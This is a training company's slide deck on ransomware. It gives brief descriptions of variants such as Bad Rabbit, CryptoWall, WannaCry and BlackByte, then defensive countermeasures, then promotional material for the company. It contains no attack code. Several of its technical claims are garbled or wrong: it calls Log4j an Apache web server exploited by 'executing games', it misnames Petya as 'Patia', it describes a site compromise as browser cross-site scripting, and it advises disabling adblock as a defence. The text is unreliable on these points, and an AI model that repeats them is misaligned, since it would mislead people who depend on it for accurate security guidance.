Infosectrain
Uploaded on Mar 17, 2022
Category
Education
Ransomware has been the most significant threat for years which has been affected over sectors and remained one of the top risks. The topics covered in the webinar are detailed in this blog for reference.
Category
Education
Ransomware- A Reality Check (Part 2)
Ransomware- A Reality Check (Part 2)
www.infosectrain.com | [email protected]
www.infosectrain.com | [email protected]
Ransomware- A reality check (Part 1)
Ransomware- A reality check (Part 2)
Ransomware- A reality check (Part 3)
www.infosectrain.com | [email protected]
Variants of Ransomware
Bad Rabbit: It was distributed by a fake Adobe Flash update on a corrupt website.
Fake Adobe Flash update; once it is downloaded, your data has been compromised.
Crypto wall: Malware hides in your zip files and other email attachments, and then it
makes its way to your devices. Once you install them, it tries to find java
vulnerabilities to encrypt or withhold your data.
Patia: It is a crypto-ransomware that targets your Windows servers, laptops, or PC and
mostly takes advantage of SMB (Server Message Block) and tries to steal your
credentials and spread them into your machine.
Wanna cry: It was first seen in a large-scale crypto-ransomware attack in 2017. It
affected almost a quarter-million machines internationally, and it spreads through
your windows operating system.
Black Byte: It is a notorious variant that compromised multiple US and foreign
businesses, including three critical US infrastructure sectors. It encrypts your files and
compromises the Windows host system, including physical and virtual servers.
www.infosectrain.com | [email protected]
Countermeasures
The following are the countermeasures or defense mechanisms to be implemented to ensure
safe data transfer:
www.infosectrain.com | [email protected]
Using Firewall to its fullest capability
Firewalls are the most reliable. If a firewall does not allow a malicious web
request or an email security gateway has been implemented, then the users will
not get any malicious attacks or emails. But if the firewall fails, there should be
backup plans.
Log4j attack: Log4j vulnerability, an Apache web server, has been exploited in
the wild by executing games and transforming from exploiting the game servers
to the actual corporate servers.
User Education
For example, if an email passes through an email security gateway and firewall,
and if the user is unaware of potential phishing emails, it develops the attack
surface.
Kevin Mitnick, the most notorious hacker, started phishing the telephone, and
the FBI searched for him a lot. There is training from this company called
KnowBe4 that makes the user aware of phishing and how to identify emails
received from an unsuspected user.
www.infosectrain.com | [email protected]
Disabling Macros execution
Now the execution of macros is the popular one where people get
exploited. For example, a malicious document is attached to a mail
received by the user unaware of it and thinks it is legitimate. He then
opens the documents, and therefore the macros get enabled in the
organization if he uses the organization network.
Macros are small code blocks that get executed automatically in the
background, primarily when an office application is based on a visual basis.
These codes are written to exploit any existing vulnerabilities in the
computers.
www.infosectrain.com | [email protected]
Implement Web security
The Cross-site scripting attack- suppose your browser is vulnerable to any particular
attack. These types of vulnerabilities of the browsers are exploited by visiting any
malicious website.
There’s a well-known chef Jamie Oliver, whose website was vulnerable. As everyone
visiting his website had downloaded the malicious code in the background. To
overcome such malicious code, every organization should implement WAF rules and
disable adblock.
www.infosectrain.com | [email protected]
Incorporate least privilege policy
Rule-based access control and our backup is most important. The privileged
access to people only to perform the activity, not the full access, is part of a
defense-in-depth strategy.
Network Segmentation
The HR Department is the one who receives more external emails document or
PDF files when compared to the software development department. Do you think
both guys should work on the same network to implement high security?.
If HR receives a malicious email and clicks, the malware starts spreading in the
environment. For example, Wipro was part of the MSSP attack. A supply chain
attack has been infected because some other team had clicked some URL that led
people to come into the network. If they had segmented their network, they
would have prevented it.
www.infosectrain.com | [email protected]
Active monitoring
Security Analyst Security Operation Center (SOC) monitors 24/7 alerts. They look
to modify and identify the attacks. For example, when they figured out that log4j
was being exploited by 3000 times of log4j attempts, they implemented alerts and
security measures to block the attempt and notify us. That helps to take further
steps and investigate that particular source or IP address.
Action Plan
It’s not about how you will be attacked; it’s about when you will be attacked. Even
organizations with high security are compromised, and an Action plan helps in this
case.
A clear and detailed action plan of what to do and how to do it when an attack
occurs includes the most practical and effective countermeasure to implement
quickly.
www.infosectrain.com | [email protected]
About InfosecTrain
• Established in 2016, we are one of the finest
Security and Technology Training and
Consulting company
• Wide range of professional training programs,
certifications & consulting services in the IT
and Cyber Security domain
• High-quality technical services, certifications
or customized training programs curated with
professionals of over 15 years of combined
experience in the domain
www.infosectrain.com | [email protected]
Our Endorsements
www.infosectrain.com | [email protected]
Why InfosecTrain Global Learning Partners
Certified and Flexible modes Access to the
Experienced Instructors of Training recorded
sessions
Post training Tailor Made
completion Training
www.infosectrain.com | [email protected]
Our Trusted Clients
www.infosectrain.com | [email protected]
Contact us
Get your workforce reskilled
by our certified and
experienced instructors!
IND: 1800-843-7890 (Toll Free) / US: +1 657-221-
1127 / UK : +44 7451 208413
[email protected]
www.infosectrain.com
Comments